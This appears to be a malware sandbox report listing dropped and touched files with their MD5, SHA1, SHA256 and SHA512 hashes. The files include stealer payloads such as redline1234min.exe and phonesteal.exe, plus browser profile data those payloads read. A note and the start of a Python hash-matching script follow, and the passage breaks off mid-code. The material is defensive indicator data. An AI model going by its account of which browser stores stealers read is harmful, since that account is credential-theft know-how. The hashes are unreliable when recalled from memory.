C:\ProgramData\PowerGo 65.0 Build 2191 Essential\PowerGo 65.0 Build 2191 Essential.exe
| MD5 | 33797df4a1c2be5c18f790f32c8c6e35 |
| SHA1 | 169ae79adce78c5b2a7d726f436c1016a46f1e34 |
| SHA256 | 3163143c3963b9cec73089397baca834e0766d0c240aad32fd53267cf6ad059f |
| SHA512 | 7cbcef8f0771db9b1e7dc24765a6c02880c0c8ca9013ac80fe9ff833d726d50b14aea374035d7b1bd5c3605dde36aa346436a51c7e3aac65c368bd1f188217b4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.linkedin.com_0.indexeddb.leveldb\LOG.old
| MD5 | 65ebe714a8d31b94dcf899222eeec6cf |
| SHA1 | a7f1606ba9c04eb150a339fbf0a73eabdf9b6bf6 |
| SHA256 | 7e6797b4a66450f63cf4b355d21e121540eea99cab1337090f3aeea66eab5d54 |
| SHA512 | da5de42441542ede2383b4de1ba6f29f20ad61d5d8d419a81be4f8b2c0caf0ee39dc493794ff350de6d8f1fc42ae33aaadd75ace194f05d90e067347342952ab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | b2a34cd1fafb149c076e79542e02e3ee |
| SHA1 | 1010819526363bf07246fdb7e857cd63af87ef8f |
| SHA256 | 1773535eda4eb57b6ff5cafb77cccca82c7f92cbfb7591b291e6ce8b08524cb9 |
| SHA512 | 52a7edc0f9e8e6df3d5d2227ec970dd8f479f4ef319a31c55bad43b7d001cff149dc23e2418803165e5bba8dface44fefaa4bae609b895e233039e5592b9b439 |
C:\ProgramData\nss3.dll
| MD5 | e3584b0beb5f7b7a2d071be81c103ee3 |
| SHA1 | f7737584784f55bd264d25ad26b616c1fb6b3c81 |
| SHA256 | fde53b629ee132ce7b98fabd65734489bcc97e89b47a605678622a7360b01b4e |
| SHA512 | 30d8421a5143b9044ada033fd259fb6f1de00318d724b0b852b479cfc468b026f6f59611a07ec824e841f622953d5b5beb3707e478691b9c15132dfa62846659 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.linkedin.com_0.indexeddb.leveldb\LOG.old
| MD5 | 04772bd7a4d7317f8d85cf87664ba00a |
| SHA1 | 2e51595316fd7edb11a565bde053f33f8dfd250a |
| SHA256 | 727493337747ae1d82a0ae92482b484c7e7f1fbc395615d9d2bf0b2c8410c173 |
| SHA512 | d8a047e9db92288cd9b395be4ce5f2962f41b8f944a01838d22ed8ef6d06a10d11bfc52f82e07b3e21925243f04c018b80a5f46adda579f67c458d5105e35ded |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 445852cd59108ac31720109f2a1b4d6b |
| SHA1 | 30fb100d6408ed539f7ed4449b9f971d80054f58 |
| SHA256 | 143de514e33e74cc2b183b7b2269784f0658b94d74a255ca59c840149c245a49 |
| SHA512 | 9571f33a3ede02e2b90ae5e64b0e5c96c14af91778bd58b429a350c93d0c7146b2823c9bcdece3ec79b74c214b4910f44cf5ad429d82aeda5df443cbcfe143c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 1087e9174feb08cba92b0d1fcc6bde02 |
| SHA1 | e9788d1feeda21469df06698583f4b06dc2e6501 |
| SHA256 | d84a40d246816461ca333f32e68aa0ea50e2e77be0321c4c2798cd798bc5060b |
| SHA512 | 4fa20a380ca1a8afedf7001b714e4aac5c16a5bcdaad3c31dd5514e931869feaf2bf79d0b46115dfe6ca12426a98f30fff4ac06ab19816c814ce8555ec6f25d8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | fd88643768438715be0f6bfd9aba03ce |
| SHA1 | 65f9f8dff465071cfb72cc7c2e03a0a26dd17535 |
| SHA256 | 52aa48c730944148b949d8b36dae09b29f1ddf54c5019a1a0f6f1ec30a002d53 |
| SHA512 | d5b32eb5bada3f2d31c7dcafb0c2529c2de0029a01fee6a51d840bdb8429f31416d448365f0da7dc20cec121a2ed003560d454d45df55a0c7603f9fbac67be15 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\e34b7fcb-11b0-4062-b00b-a03ae54d1139\index-dir\the-real-index
| MD5 | a52bdbd65356905affb5d8425f0cebed |
| SHA1 | 79325434e219da0da91723729b6ebada50708016 |
| SHA256 | 5281620da645253113b36afe48ae7a84dfa81952a83e9fc05f1c89341e88b6e3 |
| SHA512 | de9d1e361df3957193cf0e874712259a30bed977bdd76afb2199e2b01f240d87238e48570e5d22a5d3f56acd3f72f0a6172559cc35da1c315e126f35f32847bf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\e34b7fcb-11b0-4062-b00b-a03ae54d1139\index-dir\the-real-index~RFe5a2106.TMP
| MD5 | 56f42f78d385dd226258d922445900b7 |
| SHA1 | a25ee0282f4883c8df540d7d97f0887d65a7e401 |
| SHA256 | 8dac09afd895859cde61c0b0552dff08297233041db7f13681eb2976c39e8491 |
| SHA512 | 33ae84762b9c30daa7eb4a92f698b46f74b0dece51c1a61cce5a3515d0f5644c44bdd8bd4b631870532b970b8a2081decb129d1673e33eb35ab8d19a9474942d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\8e1deeb7-7781-4650-b625-eadaa414dd09.tmp
| MD5 | 7d915cff0274adcb8676d4b786736583 |
| SHA1 | 4d5b17a071e851816d15fac2174c9574a8cf06d3 |
| SHA256 | e3b26043430a63181ef5d81c8afac10f14e603b2bb2bdcef5eabaef8c0b3ef6a |
| SHA512 | 9304f2b84c946f83d91c546425340482796f94b4a9190582696ca7097bb1809893527ff756f5ac035e58986cb3c4ca2874c532976596ee59dccaa06e309112cc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 8770a0a1f672383a4d8cbf007cd04644 |
| SHA1 | 4dd8e2b9c07e2c4f1b12ad5d0b82ff0ebd6b81b8 |
| SHA256 | 64381dbc0c91af299865794c4277b5a8a672fd450bf50e04a8fe9076770ba913 |
| SHA512 | 0c0b8a8825985e026d0c1f5141e96f8c18281e7d2d4926a30054a932f81fd3397908317f9ebef61c5d125dd0277ebf65ec3f8a9a9800490b45d89147e6b846bc |
C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe
| MD5 | 789006aeb276fd615804f1583613b8d8 |
| SHA1 | 7fa20d241a55e5f594a25fe5968597fd34538aa1 |
| SHA256 | 3641183b4cb2b4793df400fbcdde79ba9a8ffba8c8a3adb99754a6e53f382239 |
| SHA512 | a73b3beb7b776a235aa3963d28b454f588a5ec226531ff3394a229cb6b2e4bec35da3e85dbb08ba8ac2dde3f98f14d2081e035a07261d3089de2f1aee7b1e2b6 |
C:\ProgramData\BackupAssert.pdf
| MD5 | b2cd526cb2b843df1ecfedf1ddbe658d |
| SHA1 | 0ab03425bcd48ef7bdf422e42c38a6ce9b921ff1 |
| SHA256 | 98a68467f915fec9491147f1353f02b0b7a2495260d8a944327022f24a950d15 |
| SHA512 | cdf87b5c5a8e24881b615ceacb1af53cb74576abb602d88ce10792afc2e2770c84e6c93f7a8f164512358ebabf673b42c28701734d33d4f150eb14dbb7ab4f4e |
C:\Users\Admin\AppData\Local\Temp\1000559001\alexlll.exe
| MD5 | f762e2c8522e89c1712b1f66dd2c167c |
| SHA1 | 301183a1613eeb1db231db679c3dfe1ae893b848 |
| SHA256 | c9e89360604570e380823ee125bcb0462766f126ec015995bbaf20b989a0cdf6 |
| SHA512 | 40b4e97c947904343c157611badc84003313f1b30000d91ba63c0646eaf188718e84f3c80b7818e58de9811423df5af881511b8d9ab647a3e997c1c63d00915c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\alexlll.exe.log
| MD5 | 8a8f1e8a778dff107b41ea564681fe7b |
| SHA1 | 08efcfdc3e33281b2b107d16b739b72af4898041 |
| SHA256 | d09cdd05da4e3e875d3d5d66c542404519759acda2efa7c00ca69aa3f6234de4 |
| SHA512 | a372330793e09c661e6bf8b2c293c1af81de77972b8b4ba47055f07be0fcdfe5e507adbc53903a0cd90c392b36fe4a8a41d3fea923ad97fa061dbef65398edf6 |
C:\Users\Admin\AppData\Local\Temp\1000560001\father1.exe
| MD5 | 510dfa5c4583fda89207e06125341dc3 |
| SHA1 | 91e7c4915b8db8effcb1a26d77c3987a695ae66a |
| SHA256 | 93b1c76d04b7977a070685303973aad9308781cd057bbf672b4f1367874807d6 |
| SHA512 | 20d75af986ae7593dfa62fe7004a0108ee4c3f37f0d8807442d7d594b55c74f1ccbc0fbd5a3c89f18a75f19b3807f3183240739f498d4379fa0a06ed3163c792 |
C:\ProgramData\SplitAssert.xlsx
| MD5 | 5656c90a867a2c9f30e08b4ac8512696 |
| SHA1 | 93cf65efd08bc2fece438715c89f15d303cfee20 |
| SHA256 | f018615f7cb05f42f36835e083bc9a780125d1b60290ffe0236278861b10a522 |
| SHA512 | 643297c61b9d6db308fe637ee06567a9fddbff6b7468ada9c31ecb65fffd33bd910de0582990738d4886ec3655c312eb6b35295e36f8f3dd143a494fb9136a64 |
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus
| MD5 | 31f5347dd5113abd2e88456378d0d4c9 |
| SHA1 | 3d395ff1585b7ff799a1cd58a05e0c257d4c279c |
| SHA256 | 9589e787ef36c8cee915f6df4bfc65a47bdeca77edd8ef7f62ca6814d732b694 |
| SHA512 | 5afaf383386f8300fdc638f64b1f0b7e2209a50d1483cc8cb2d03d359a6e0679f993a3bf89cf81e97048839834a9e22fd6d023c567b4de4d260246812b71e542 |
C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe
| MD5 | ea037914e6f1aa6a8ad565407158d49b |
| SHA1 | 5fbbd923c0bbcf33fafca5a0ed847c19478856e5 |
| SHA256 | 9deee2315490381305b70eeaff5805df00d10feb9d9f78fbce33b3cd5795ed73 |
| SHA512 | 369943b3ac01a8c89c7d163391e60c2a4f9f616ade5161df8a67e75c490ff4a70b37d4b617675518c924d2fbc07605a37d4f76166da9becefcb4bd5052a69e55 |
C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe
| MD5 | 8279f809e29bd79218d79f4b8f02039f |
| SHA1 | 2112625658098e14bacee7a7cc8156350f51a293 |
| SHA256 | 4d4f6211fb491eb9ea6009db1053657d9b4fd7cbae4d8513bb7b9e228683d696 |
| SHA512 | f359e47827fc741c9f15f5146476f63795370a3458da9be34a874ca8c021bfa4dfdc13786b7f6cc360bbbe82998f7467f1bd38f86bdcf0661233a8821b41f61f |
C:\Users\Admin\AppData\Local\Temp\_MEI38322\tzdata\zoneinfo\Africa\Conakry
| MD5 | 796a57137d718e4fa3db8ef611f18e61 |
| SHA1 | 23f0868c618aee82234605f5a0002356042e9349 |
| SHA256 | f3e7fcaa0e9840ff4169d3567d8fb5926644848f4963d7acf92320843c5d486e |
| SHA512 | 64a8de7d9e2e612a6e9438f2de598b11fecc5252052d92278c96dd6019abe7465e11c995e009dfbc76362080217e9df9091114bdbd1431828842348390cb997b |
C:\Users\Admin\AppData\Local\Temp\_MEI38322\tzdata\zoneinfo\America\Curacao
| MD5 | 92d3b867243120ea811c24c038e5b053 |
| SHA1 | ade39dfb24b20a67d3ac8cc7f59d364904934174 |
| SHA256 | abbe8628dd5487c889db816ce3a5077bbb47f6bafafeb9411d92d6ef2f70ce8d |
| SHA512 | 1eee8298dffa70049439884f269f90c0babcc8e94c5ccb595f12c8cfe3ad12d52b2d82a5853d0ff4a0e4d6069458cc1517b7535278b2fdef145e024e3531daad |
C:\Users\Admin\AppData\Local\Temp\_MEI38322\tzdata\zoneinfo\Africa\Lagos
| MD5 | 89de77d185e9a76612bd5f9fb043a9c2 |
| SHA1 | 0c58600cb28c94c8642dedb01ac1c3ce84ee9acf |
| SHA256 | e5ef1288571cc56c5276ca966e1c8a675c6747726d758ecafe7effce6eca7be4 |
| SHA512 | e2fb974fa770639d56edc5f267306be7ee9b00b9b214a06739c0dad0403903d8432e1c7b9d4322a8c9c31bd1faa8083e262f9d851c29562883ca3933e01d018c |
C:\Users\Admin\AppData\Local\Temp\_MEI38322\tzdata\zoneinfo\Africa\Kigali
| MD5 | a87061b72790e27d9f155644521d8cce |
| SHA1 | 78de9718a513568db02a07447958b30ed9bae879 |
| SHA256 | fd4a97368230a89676c987779510a9920fe8d911fa065481536d1048cd0f529e |
| SHA512 | 3f071fd343d4e0f5678859c4f7f48c292f8b9a3d62d1075938c160142defd4f0423d8f031c95c48119ac71f160c9b6a02975841d49422b61b542418b8a63e441 |
C:\Users\Admin\AppData\Local\Temp\_MEI38322\tzdata\zoneinfo\Africa\Djibouti
| MD5 | fe54394a3dcf951bad3c293980109dd2 |
| SHA1 | 4650b524081009959e8487ed97c07a331c13fd2d |
| SHA256 | 0783854f52c33ada6b6d2a5d867662f0ae8e15238d2fce7b9ada4f4d319eb466 |
| SHA512 | fe4cf1dd66ae0739f1051be91d729efebde5459967bbe41adbdd3330d84d167a7f8db6d4974225cb75e3b2d207480dfb3862f2b1dda717f33b9c11d33dcac418 |
C:\Users\Admin\AppData\Local\Temp\_MEI38322\tzdata\zoneinfo\America\Toronto
| MD5 | 628174eba2d7050564c54d1370a19ca8 |
| SHA1 | e350a7a426e09233cc0af406f5729d0ab888624f |
| SHA256 | ad2d427ab03715175039471b61aa611d4fdf33cfb61f2b15993ec17c401ba1e5 |
| SHA512 | e12bf4b9a296b4b2e8288b3f1e8f0f3aeaee52781a21f249708e6b785a48100feab10ac8ba10ac8067e4b84312d3d94ed5878a9bda06c63efe96322f05ebbc6f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
| MD5 | 72aa52f60e59a5f8186c2b593cc0888b |
| SHA1 | cd07830b46df11bb98950e506834fac6248134fd |
| SHA256 | 1615dc5917799568b7970989a0653b4194ebfea3b7dcd4c457499a2857dadbec |
| SHA512 | 315f11324ac179cb0e74c93e34840c8d52520a54ef8312e0a3a22493cead66285572bed63c92925bbc60883c0ec99f2cd09c81f59ae93f6cee0afdc3cce7adcd |
C:\Users\Admin\AppData\Local\Temp\_MEI38322\tzdata\zoneinfo\Europe\Skopje
| MD5 | a4ac1780d547f4e4c41cab4c6cf1d76d |
| SHA1 | 9033138c20102912b7078149abc940ea83268587 |
| SHA256 | a8c964f3eaa7a209d9a650fb16c68c003e9a5fc62ffbbb10fa849d54fb3662d6 |
| SHA512 | 7fd5c4598f9d61a3888b4831b0c256ac8c07a5ae28123f969549ae3085a77fece562a09805c44eab7973765d850f6c58f9fcf42582bdd7fd0cdba6cd3d432469 |
C:\Users\Admin\AppData\Local\Temp\_MEI38322\tzdata\zoneinfo\Pacific\Yap
| MD5 | bcf8aa818432d7ae244087c7306bcb23 |
| SHA1 | 5a91d56826d9fc9bc84c408c581a12127690ed11 |
| SHA256 | 683001055b6ef9dc9d88734e0eddd1782f1c3643b7c13a75e9cf8e9052006e19 |
| SHA512 | d5721c5bf8e1df68fbe2c83bb5cd1edea331f8be7f2a7ef7a6c45f1c656857f2f981adb2c82d8b380c88b1ddea6abb20d692c45403f9562448908637d70fa221 |
C:\Users\Admin\AppData\Local\Temp\_MEI38322\tzdata\zoneinfo\PRC
| MD5 | dff9cd919f10d25842d1381cdff9f7f7 |
| SHA1 | 2aa2d896e8dde7bc74cb502cd8bff5a2a19b511f |
| SHA256 | bf8b7ed82fe6e63e6d98f8cea934eeac901cd16aba85eb5755ce3f8b4289ea8a |
| SHA512 | c6f4ef7e4961d9f5ae353a5a54d5263fea784255884f7c18728e05806d7c80247a2af5d9999d805f40b0cc86a580a3e2e81135fdd49d62876a15e1ab50e148b7 |
C:\Users\Admin\AppData\Local\Temp\_MEI38322\tzdata\zoneinfo\UCT
| MD5 | 51d8a0e68892ebf0854a1b4250ffb26b |
| SHA1 | b3ea2db080cd92273d70a8795d1f6378ac1d2b74 |
| SHA256 | fddce1e648a1732ac29afd9a16151b2973cdf082e7ec0c690f7e42be6b598b93 |
| SHA512 | 4d0def0cd33012754835b27078d64141503c8762e7fb0f74ac669b8e2768deeba14900feef6174f65b1c3dd2ea0ce9a73bba499275c1c75bcae91cd266262b78 |
C:\Users\Admin\AppData\Local\Temp\_MEI38322\tzdata\zoneinfo\Pacific\Wallis
| MD5 | ba8d62a6ed66f462087e00ad76f7354d |
| SHA1 | 584a5063b3f9c2c1159cebea8ea2813e105f3173 |
| SHA256 | 09035620bd831697a3e9072f82de34cfca5e912d50c8da547739aa2f28fb6d8e |
| SHA512 | 9c5dba4f7c71d5c753895cbfdb01e18b9195f7aad971948eb8e8817b7aca9b7531ca250cdce0e01a5b97ba42c1c9049fd93a2f1ed886ef9779a54babd969f761 |
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new
| MD5 | ff6a2ca07ffc902aa000276724018d24 |
| SHA1 | 154b76d382e0ce755ea1eec7b35b155148dc9cfe |
| SHA256 | 591a3e8b4126822e55db01676efafd23804d41b7cc4ddf7977069bb946059edb |
| SHA512 | bde7a9e38af41f3625d5cc27c0cee5ea9f769f58ef561a7bd289bae80e92da85e66ddb25fb6bd0cb1f7414c7c5d291028d62038c120e12780b7e73c9746ba999 |
C:\Users\Admin\AppData\Local\Temp\_MEI38322\tzdata\zoneinfo\Europe\Oslo
| MD5 | 2577d6d2ba90616ca47c8ee8d9fbca20 |
| SHA1 | e8f7079796d21c70589f90d7682f730ed236afd4 |
| SHA256 | a7fd9932d785d4d690900b834c3563c1810c1cf2e01711bcc0926af6c0767cb7 |
| SHA512 | f228ca1ef2756f955566513d7480d779b10b74a8780f2c3f1768730a1a9ae54c5ac44890d0690b59df70c4194a414f276f59bb29389f6fa29719cb06cb946ceb |
C:\Users\Admin\AppData\Local\Temp\_MEI38322\tzdata\zoneinfo\Europe\London
| MD5 | d111147703d04769072d1b824d0ddc0c |
| SHA1 | 0c99c01cad245400194d78f9023bd92ee511fbb1 |
| SHA256 | 676541f0b8ad457c744c093f807589adcad909e3fd03f901787d08786eedbd33 |
| SHA512 | 21502d194dfd89ac66f3df6610cb7725936f69faafb6597d4c22cec9d5e40965d05dd7111de9089bc119ec2b701fea664d3cb291b20ae04d59bcbd79e681d07a |
C:\Users\Admin\AppData\Local\Temp\_MEI38322\tzdata\zoneinfo\Etc\Greenwich
| MD5 | e7577ad74319a942781e7153a97d7690 |
| SHA1 | 91d9c2bf1cbb44214a808e923469d2153b3f9a3f |
| SHA256 | dc4a07571b10884e4f4f3450c9d1a1cbf4c03ef53d06ed2e4ea152d9eba5d5d7 |
| SHA512 | b4bc0ddba238fcab00c99987ea7bd5d5fa15967eceba6a2455ecd1d81679b4c76182b5a9e10c004b55dc98abc68ce0912d4f42547b24a22b0f5f0f90117e2b55 |
C:\Users\Admin\AppData\Local\Temp\1000561001\redline1234min.exe
| MD5 | a1cfa7fe3389a266004f4063615f0d86 |
| SHA1 | 05e5f41bdb8798a28034e8e7f437b2356fdd75dd |
| SHA256 | 75c73a861896b3c1c750b15bcb749db041d6fc933a73a782dc0adeef102bc2e6 |
| SHA512 | 6e7f126ef93a32c1c31a94c4b3744f9919d55780aabdf6f6d0ca799924252aa0ebc0670609f90bcf9cb11b61297cc903ac01baba153e4e92a47f7929c5dcd034 |
C:\Users\Admin\AppData\Local\Temp\1000564041\do.ps1
| MD5 | d769ca0816a72bacb8b3205b4c652b4b |
| SHA1 | 4072df351635eb621feb19cc0f47f2953d761c59 |
| SHA256 | f4cc3a4606856fd811ecbcdf3fc89fa6418a1b3c8f56ca7ff5717713e8f806a2 |
| SHA512 | cf13fd667e71707d63d394391b508f5a1ee5ffa7ac27fe35906e15059e9fccc8ad61e91ce3ffd537e8daa0f6306d130997e9b448a4466407fa0c894917850b64 |
C:\Users\Admin\AppData\Local\Temp\1000565001\goldprimedfsdf.exe
| MD5 | d423f68b6e03713dc41d46b9060963de |
| SHA1 | 78f230abd55fadb5c7bd9d58ccc78e37e3fcdbf7 |
| SHA256 | 26ba5397f5d4ac14a6d1ffa7cd7285d6f6f4b9fdfc745851ba79dcde44053897 |
| SHA512 | 9e8bce9fbc0169b417bdc903fe554361331cd985f2af0684b553a7063b123ccaf65a91a54aee89257d13847bcc7f3ab0db81fa6229382aed008e9e11227c1512 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | cd4b70037d6591e657348fe9a1c700b1 |
| SHA1 | a6912dd0d35967f11bd4bf61f92caed157b4ba29 |
| SHA256 | 91b626e6d75d06e0a7b6df0f61c919c06e73c2b83eb3b9e8362be3a2a4d1ad20 |
| SHA512 | c1be900bb2d6a956dd80157133beaf810ef3bd57b91082375c6a844bdf9ee566e66b1519859318f0fdab91344e58680fe7d7aa0a3ad01b91654632db11d79e90 |
C:\Users\Admin\AppData\Local\Temp\1000572001\judi1234.exe
| MD5 | 4566c04776530a9d67a1af8fb4dd3a40 |
| SHA1 | f26c7c2ead58b2a375284ce04808953b78aa0411 |
| SHA256 | a6402dd6f9a926bb582482451e4752fbe99852d2c22c228949f5b0b4c9710a1f |
| SHA512 | b9b7051668a4ddddfa13674862d6e3731b5ef881173fa979278a53700b5beff3fac5df910948aa7001ebb1c5ff23f1e06741f1e28589ae91144d71c6d5c5d1d6 |
C:\Users\Admin\AppData\Local\Temp\1000573001\phonesteal.exe
| MD5 | 8ef748679a382f74b6038f45a82943f3 |
| SHA1 | 894bc4572d00c9f5921c193a989a0edf1e321b9d |
| SHA256 | 4daff7bdde7edceb88391b7578440d2ddb1d40e5559cbbb57163af42380b5bc9 |
| SHA512 | 6e4064b1a971b5b4b2acc2316f764161b658cdbe1642cc5d91c715fe49d8e259441ad24b4c02133927006f4d35820856a388454d37957fe58fcb21dc86e2c69f |
C:\Users\Admin\AppData\Local\Temp\1000574001\InstallSetup3.exe
| MD5 | 0de49e82418a936117d3e0cea199aa40 |
| SHA1 | f030c480b1df137358936fd425c0678976e1d623 |
| SHA256 | 1c5d0fb7af95481db5d3604b6ed21a17412bd2c507257627acfdab34d4a9b07d |
| SHA512 | e77c6ff045a3a85b1ff540e3f0de349ee3bda569c9768fa47449dd46a19c5aa728625ac6bdab661102d68f172fe0030ddab3d5d58bff08ef5e24195e7c0f1ce8 |
C:\Users\Admin\AppData\Local\Temp\nsm9EB5.tmp
| MD5 | 5e4f177ee5095c42d9660e7f1cf7231f |
| SHA1 | 3877e42e8eb575fb045f75275ccfa8249bd88183 |
| SHA256 | da4f424f0c4a46fd1c01b39a1f448669efa8f1670bda478202e28056fcf66681 |
| SHA512 | 34c4ecca42bef369a11ece124e4a83c2b3a1b570164a1df69ff18e333cdfe6f4f2c5460606d1ed1c3946d2ca8840ebfecf8b544474e7815dba297f2c877e0c93 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g596d4s2.default-release\sessionCheckpoints.json.tmp
| MD5 | ea8b62857dfdbd3d0be7d7e4a954ec9a |
| SHA1 | b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a |
| SHA256 | 792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da |
| SHA512 | 076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g596d4s2.default-release\sessionCheckpoints.json.tmp
| MD5 | c4ab2ee59ca41b6d6a6ea911f35bdc00 |
| SHA1 | 5942cd6505fc8a9daba403b082067e1cdefdfbc4 |
| SHA256 | 00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2 |
| SHA512 | 71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 60bfbfec55ae60d8ff40c7f4f6992735 |
| SHA1 | 11c6a7594e700ec965d76f6ce995de4c600248fe |
| SHA256 | 482824852c1b2d53384e888494fcf2bfd8634281f80d4a7799f3dda3aef89578 |
| SHA512 | d8f440568fa279d14ad32b928a65ca275cabe154e0b0043bad02d022d2e6817f41ea9755c09f608722bed5980e3568de2bd65ad9a24be89cbbcb11ac585962e7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g596d4s2.default-release\datareporting\glean\pending_pings\670fc842-69a0-43fb-9300-2970f05edf36
| MD5 | e5f6fdc316ac7d5dc3a9e11108e8a9ab |
| SHA1 | 3a34e575ae76fcf577e0667fb884074f04020a48 |
| SHA256 | 89a3b1660a5446c7b720066586cd89626804df44b411ecc29069027162c82010 |
| SHA512 | 0604f03d3fc6f93f7258f91d3aa198e6a1bb4b7162db922a26bcdf7fd4cd44c000125e2ebb375febe36ed08147cbeaa5ac8068e86b09dccd049f5e997aca100c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g596d4s2.default-release\datareporting\glean\pending_pings\5fa7b9ec-a54b-461e-a8eb-476f39c6c4b8
| MD5 | b250dbfefdff5c90c80121522e25b040 |
| SHA1 | 3183a84819c9c1b41b85a045a2e223a6c6467e37 |
| SHA256 | 43293a280da9c9d5ae3cad297839c3af50747826335c1fe35e673163d87561e2 |
| SHA512 | a3b4e65816dc9fdc916a3195541eed8b78c00a25aafb753e6c1aec3b7778407ed7f6fc7c53e970d3c2e279f64dfcd42b791f4fda6fe249d1331afd40139dade4 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g596d4s2.default-release\datareporting\glean\db\data.safe.bin
| MD5 | bb36e66e0d3f977c9c64f61456ad612d |
| SHA1 | ee5ffa6fc98bf694c65c3ec5c6af03358eb1ca7f |
| SHA256 | 9d90b13ae0700a38c327ff9820269324052d783d94f4063170e7d2dd256253f2 |
| SHA512 | 1e8681126ca5760e76ae637cdd1e0eb23f5dcea229d176b348c3bcd6a45cf47c3dfe1c3befcd008c72183dd767aee14ec11823fdffd790332fc265bfe415ba75 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g596d4s2.default-release\prefs-1.js
| MD5 | fd972b1d34a14d26c1908b1de8f719ec |
| SHA1 | bdf90a8a2b218254c7aa92250eee4e6ad8550c57 |
| SHA256 | 1e54c15ad844b4edd4e86e14479dcde64510e9c5737b96b0a5113f33e90b2497 |
| SHA512 | 390fed1205988e31edcc909f3b2be17fbff907d37ff402175b3b6cf44a5c0403e7eeb94bb670b5b1989a83b199bddf1826c6bfe43aad83419e099b8cdc2f8198 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g596d4s2.default-release\storage\default\https+++www.youtube.com\cache\morgue\235\{528dd5af-3717-41a0-b27c-b21830ffd1eb}.final
| MD5 | 2a252393b98be6348c4ba18003cc3471 |
| SHA1 | 40f75302fcbe4a8ac2e33a8d9daf801abc2a9598 |
| SHA256 | 04cae3c7b208fc55b25763913d0bbdc99232942086efdf705f2a27764be6f5ee |
| SHA512 | 07af4a7b0d10f1b5e1fe0877b21abc98483d78797608a1763cfb71e25559fdce10d20f03c16f4284d7ae7ab90266f45240425e3a264de9525ec1657345b85198 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g596d4s2.default-release\storage\default\https+++www.linkedin.com\idb\1803601664sreeqbumeunNce.sqlite
| MD5 | 332a8fdc3ea9374923de25c3c9d2774f |
| SHA1 | bcb42b7b01b58eccfed1aef33667b942921dd997 |
| SHA256 | f18fe7adbb0d683930c78a671820bc74e9d4227989435b1f33abb9a8f8061812 |
| SHA512 | 86055e19fc3f0f95848c4ee34efcdbaf5979d73d372d15d1a257d683b8c9996dbfc706e0eda3b8bcb757f25d74cdc6723372f5127eada1ef1e025cb4e75d2d7d |
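The dropped-file listing above mixes the stager and payload binaries (`redline1234min.exe`, `goldprimedfsdf.exe`, `judi1234.exe`, `phonesteal.exe`, `InstallSetup3.exe`, `do.ps1`) with files the sample merely touched: browser profile data that the stealers read (the Firefox, Chrome and Edge entries) and the `tzdata\zoneinfo` tree a PyInstaller bundle extracts under `_MEI38322` at runtime. When carrying these indicators into a hunt, a practitioner wants to parse the listing mechanically, sanity-check each digest's length (a transcribed 63-character SHA256 never matches anything), separate the executable/script droppers from the noise, and compare local files against the SHA256 set. The following Python is an added example written for this page, not code from the sandbox vendor or the report; it assumes the record layout exactly as printed here (a path line followed by one table row per algorithm), and the extension-based payload filter is a triage heuristic of my own, not something the report asserts. The two embedded records are copied from the listing above so the example runs offline.

```python
"""Parse a sandbox dropped-files listing into hash records and match local files against it."""
import hashlib
import re
from dataclasses import dataclass, field
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# Constructed sample input: two records copied verbatim from the listing on this page.
SAMPLE_REPORT = """\
C:\\Users\\Admin\\AppData\\Local\\Temp\\1000561001\\redline1234min.exe
| MD5 | a1cfa7fe3389a266004f4063615f0d86 |
| SHA1 | 05e5f41bdb8798a28034e8e7f437b2356fdd75dd |
| SHA256 | 75c73a861896b3c1c750b15bcb749db041d6fc933a73a782dc0adeef102bc2e6 |
| SHA512 | 6e7f126ef93a32c1c31a94c4b3744f9919d55780aabdf6f6d0ca799924252aa0ebc0670609f90bcf9cb11b61297cc903ac01baba153e4e92a47f7929c5dcd034 |
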